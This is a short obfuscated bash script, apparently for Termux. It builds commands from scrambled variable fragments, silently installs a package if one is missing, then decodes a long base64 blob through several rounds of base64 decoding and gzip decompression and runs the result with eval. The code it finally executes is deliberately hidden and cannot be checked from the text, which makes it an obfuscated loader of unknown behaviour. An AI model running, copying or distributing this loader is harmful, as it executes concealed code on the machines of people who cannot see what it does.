#!/bin/bash
z="
";Cz='Zzzz';hz=']]; ';Nz=''\''ech';gz=' '\'''\'' ';iz='then';Dz='ZZzz';Xz=''\''';Gz='zzz=';Tz='e64'\''';lz='zzZZ';Jz='zZzZ';Bz='ZZZZ';Wz=''\'' -d';Oz='o'\''';Qz=''\''eva';Hz=''\''gzi';az='$zzz';Sz=''\''bas';oz='fi';Pz='zzZz';Iz='p'\''';jz='pkg ';fz='Zz =';kz='i $z';Fz='ZZZz';Kz='zZzz';dz='if [';Vz='Zzz=';Yz='$(wh';Ez='zzzz';Mz='zZz=';nz='y';Rz='l'\''';Lz='ZzzZ';ez='[ $z';Az='zzzZ';cz=')';bz='zZZZ';mz='zz -';Zz='ich ';Uz='zZZz';eval "$Az$Bz$Cz$Dz$Ez$Fz$Ez$Ez$Dz$Gz$Hz$Iz$z$Az$Az$Cz$Jz$Kz$Kz$Lz$Ez$Cz$Mz$Nz$Oz$z$Az$Jz$Kz$Pz$Jz$Az$Jz$Kz$Pz$Gz$Qz$Rz$z$Pz$Pz$Ez$Cz$Ez$Kz$Az$Ez$Kz$Gz$Sz$Tz$z$Pz$Kz$Az$Ez$Az$Az$Az$Uz$Az$Vz$Wz$Xz$z$Kz$Pz$Dz$Kz$Az$Az$Kz$Az$Ez$Mz$Yz$Zz$az$Bz$Dz$Uz$Ez$bz$Ez$Ez$Uz$Ez$cz$z$dz$ez$Cz$Jz$Cz$Cz$Pz$Pz$Cz$Pz$Ez$fz$gz$hz$iz$z$jz$kz$lz$Bz$Az$Cz$Az$Dz$Ez$Az$Cz$mz$nz$z$oz";zZzzzzzzzzZZZZZZZzzzzzzzzZZzzzZzzzZZzzz=$($zzzZzzzZZzzzzZzZzZzzzZzzZzzZzzzzZzzzzZz "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"|$zzZzzzZzzzzzZzzzzzzzzZzzzzzZzzzzzZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz);$zzzZzZzZzZzzzzZzzZzZzzzZzZzZzZzzzzZzzzz "$zZzzzzzzzzZZZZZZZzzzzzzzzZZzzzZzzzZZzzz"
